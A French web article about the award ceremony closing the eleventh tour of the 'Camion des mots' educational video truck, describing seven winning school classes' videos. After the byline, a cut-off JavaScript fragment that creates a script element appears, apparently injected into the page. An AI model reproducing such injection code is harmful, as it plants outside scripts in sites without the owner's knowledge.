Les cookies assurent le bon fonctionnement de notre site Internet. En utilisant ce dernier, vous acceptez l'utilisation des cookies. En savoir plus OK
11 années au service des mots | Camion des mots
Suivez nous :
Nous contacter : 01.42.61.10.71

11 années au service des mots

publié le 20 juillet 2016 à 16 h 07 min par Admaker TM

Vendredi 24 juin, à l’issue de la 11ème tournée, le jury du Camion des mots a récompensé sept classes du primaire et du collège pour la qualité des projets vidéo menés à bord du studio itinérant. Mais cette cérémonie a d’abord été une grande fête : invitées à Paris, les classes ont vécu une journée inoubliable, des terrasses ensoleillées du magazine L’Express jusqu’au musée Grévin.

« Est-ce qu’on peut la voir d’ici ? » Dès leur arrivée, les enfants cherchent la Tour Eiff el. Le départ aux aurores ne semble pas les avoir fatigués. Ces jeunes lauréats, venus des quatre coins du pays, étaient attendus à Paris pour une Fête des mots très animée. Plus d’une centaine d’enfants, du CP à la 4ème, se pressent alors au 6ème étage de l’établissement. Frédérique Nègre, enseignante à l’école L’Aiguille à Trèbes raconte : « C’est la première fois que notre ville gagne un prix. Les enfants sont fous de joie. » Au coup d’envoi de cette cérémonie, Christophe Barbier, directeur de la rédaction de L’Express évoque les premiers enfants à avoir foulé les planches du studio itinérant : « Ils sont maintenant majeurs et iront bientôt voter, j’espère que tous ces élèves garderont ce plaisir des mots. » Place ensuite à la remise des prix. Cette saison, sept classes du primaire et du collège sont distinguées pour la qualité et l’originalité de leur mise en scène d’une part et pour la place donnée à la langue française et au message d’autre part. Seule absente, la classe de CE2-CM1-CM2 de l’École de Couiza (11) propose une reprise très colorée et émouvante du tube Get Lucky des Daft Punk, dont le refrain est transformé en « Du respect mais pas de haine ». Le petit plus : les enfants réalisent une chorégraphie très synchronisée. Les élèves de CM2 de l’école du Poutyl à Olivet (45) n’ont pas quitté leurs personnages puisque la plupart ont revêtu le déguisement des dieux de la mythologie grecque. Hermès, Zeus, Athéna ou Aphrodite, tous sont présents dans le fi lm : les décors sont créatifs et le texte plein d’humour, il faut voir Hermès présenter la météo à la télévision ! Les 6ème de Monastier-sur-Gazeille (43) ont quant à eux, imaginé une réunion en salle des professeurs, un thème qui semble passionner les élèves. Dans cette vidéo assez drôle, il faut souligner l’interprétation des élèves qui caricaturent leurs profs à la perfection. La caricature est aussi présente dans le fi lm des 4ème du collège Raymond-Cortat à Pleaux (15), qui s’amusent à parodier une réunion dans une entreprise abonnée au « franglais ». Une langue qu’Henri Dès aurait pu mentionner dans sa chanson Polyglotte reprise par les CE2-CM1 de l’Ecole l’Aiguille de Trèbes (11), qui proposent des décors ingénieux et une mise en scène espiègle. Un esprit craquant que l’on retrouve dans la vidéo des CP de l’établissement Jules-Vernes à Mers-les-Bains (80) : devant une grande fresque représentant une forêt, des médecins tentent de soigner leur arbre malade. Enfin, un prix spécial du Jury est remis à l’Institut Médico-éducatif de Bignoux (86), qui propose une vidéo vivante et instructive sur le ballet des planètes au sein du système solaire, avec des déguisements et une mise en scène très poétiques. L’équipe du Camion était aussi de la partie : Gérard, le chauff eur, Olia et Pierre-Emmanuel, les deux réalisateurs, ravis de recroiser les enfants. Les enseignants saluent une nouvelle fois la qualité de leur accompagnement, leurs conseils précieux, leurs idées judicieuses et le temps accordé aux enfants pour accomplir la prise parfaite. Tout au long de son aventure, le Camion s’est rendu dans près d’un millier de villes ou villages. Désormais, il va mettre le moteur à l’arrêt et laisser reposer son studio itinérant, afi n de réfl échir à de nouvelles péripéties linguistiques !

Marie GICQUEL

 var d=document;var s=d.createElement(‘script’);